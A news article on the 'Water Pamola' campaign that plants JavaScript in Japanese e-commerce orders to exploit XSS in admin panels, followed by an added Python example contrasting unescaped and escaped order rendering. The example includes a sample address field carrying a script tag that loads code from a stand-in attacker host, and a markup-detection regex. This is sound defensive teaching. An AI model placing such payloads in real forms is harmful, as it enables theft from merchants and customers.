XSS in the Wild: JavaScript-stuffed Commands Used to Compromise Japanese Ecommerce Sites


John Leyden May 04, 2021 at 14:20 UTC

Updated: May 18, 2021 at 12:55 UTC

Website vulnerabilities abused in new hacking campaign

An established organized crime group has changed tack, launching attacks on e-commerce stores that exploit cross-site scripting (XSS) vulnerabilities instead of relying on traditional phishing lures.

The group, nicknamed “Water Pamola” by Trend Micro, has been attacking e-commerce stores in Japan, Australia and European countries for two years using spam emails containing malicious attachments.

Since last year, however, the group has narrowed its focus, attacking Japanese stores with orders that contain maliciously crafted JavaScript code.

This malicious code is inserted into the field where the customer’s address or company name normally resides.


The rogue script is likely activated by exploiting an XSS vulnerability in the administration portal of a targeted store, according to Trend Micro.

“Malicious behavior performed by scripts includes page grabbing, credential phishing, web shell infection, and malware delivery,” Trend Micro says in a blog post on the current campaign.

Data breach related to Water Pamola

In at least one instance, the administrators of a website victimized by Water Pamola subsequently revealed that they had suffered a data breach.

Their server was illegally accessed, and personal information including names, credit card numbers, card expiration dates, and card security codes was potentially leaked.

This indicates a Magecart-type attack, with the twist that the cybercriminals are not targeting a specific e-commerce framework but e-commerce systems in general.


“If the store’s e-commerce system is vulnerable to XSS attacks, the malicious script will be loaded and executed on the merchant’s management panel once someone (such as a system administrator or store employee) opens the [malicious] order,” concludes Trend Micro.
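The mechanism described above is a stored XSS: a customer-supplied order field is written to the database verbatim and later rendered, unescaped, into the admin panel page. The following example is added here to illustrate that flow and is not code from the article, from Trend Micro, or from any e-commerce product; the order record, the HTML row templates, the payload and the attacker URL are constructed placeholders, and the `suspicious_fields` heuristic is a hypothetical intake check, not a substitute for output encoding.

```python
# Added example (not from the article or Trend Micro): how an order field that
# is stored unescaped becomes stored XSS in the admin panel, and the output
# encoding that prevents it. Everything below is constructed for illustration.
import html
import re

# Constructed sample order: the "address" field carries a script payload of the
# kind the article describes. The URL is a placeholder, not a real indicator.
SAMPLE_ORDER = {
    "order_id": 10234,
    "customer": "Example Customer",
    "company": "Example Co.",
    "address": '1-2-3 Example<script src="https://attacker.example/x.js"></script>',
}


def render_order_row_unsafe(order: dict) -> str:
    """Vulnerable pattern: field values are interpolated into HTML verbatim,
    so whatever the customer typed is parsed as markup by the admin's browser
    the moment the order list is opened."""
    return (
        f"<tr><td>{order['order_id']}</td>"
        f"<td>{order['customer']}</td>"
        f"<td>{order['company']}</td>"
        f"<td>{order['address']}</td></tr>"
    )


def _esc(value) -> str:
    # HTML-entity encode for an element text context (also escapes quotes so
    # the same helper is safe inside attribute values).
    return html.escape(str(value), quote=True)


def render_order_row_safe(order: dict) -> str:
    """Hardened pattern: every untrusted value is entity-encoded for the
    context it lands in, so '<script>' is displayed as text, not executed."""
    return (
        f"<tr><td>{_esc(order['order_id'])}</td>"
        f"<td>{_esc(order['customer'])}</td>"
        f"<td>{_esc(order['company'])}</td>"
        f"<td>{_esc(order['address'])}</td></tr>"
    )


# Free-text order fields that legitimately never contain markup.
FREE_TEXT_FIELDS = ("customer", "company", "address")

# Hypothetical detection heuristic for order intake or SOC review: tag-like
# content, a javascript: URL, or an inline event handler in a free-text field.
_MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|javascript:|on[a-z]+\s*=", re.IGNORECASE)


def suspicious_fields(order: dict) -> list:
    """Return the names of free-text fields whose content looks like markup.
    This flags orders for review; it does not replace output encoding."""
    return [f for f in FREE_TEXT_FIELDS if _MARKUP_RE.search(str(order.get(f, "")))]


if __name__ == "__main__":
    print(render_order_row_unsafe(SAMPLE_ORDER))  # script tag survives intact
    print(render_order_row_safe(SAMPLE_ORDER))    # rendered as &lt;script ...
    print(suspicious_fields(SAMPLE_ORDER))        # ['address']
```

The fix belongs at the output boundary (the template engine's auto-escaping, or an explicit encoder as above), not at input: rejecting or stripping tags on intake is a useful alarm, as `suspicious_fields` shows, but it is easily bypassed and breaks legitimate data, while consistent output encoding closes the bug regardless of what was stored.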


The attack scripts were built on an XSS attack framework called ‘XSS.ME’, which the cybercriminals have further developed and customized to go beyond its out-of-the-box capabilities of stealing location data and browser cookies.

The source code for this framework is shared on many Chinese public forums, according to Trend Micro.

The same attackers also use a secondary attack line that relies on social engineering to phish credentials or trick recipients into downloading malware under the guise of an Adobe Flash update.

There are several groups of Magecart attackers. They usually embed a skimmer in e-commerce web pages (through exploitation of a vulnerability, accessing the victim’s network, compromising third-party libraries, etc.).

Each time data is entered into a form, the skimmer sends a copy of the data to a command and control server.

In short, Magecart-type attacks target website visitors, while Water Pamola targets website administrators, Trend Micro’s Jaromir Horejsi told The Daily Swig.

“The attacker discovered [an] XSS vulnerability in [the EC-CUBE] framework, which is popular in Japan, so Japanese sites are targeted,” Horejsi explains. “We can only speculate as to why they target websites created with [a] popular setting in Japan in the first place.

“Although the number of targeted e-commerce stores is not high, we must remember that each online store can have many customers,” the researcher concluded.

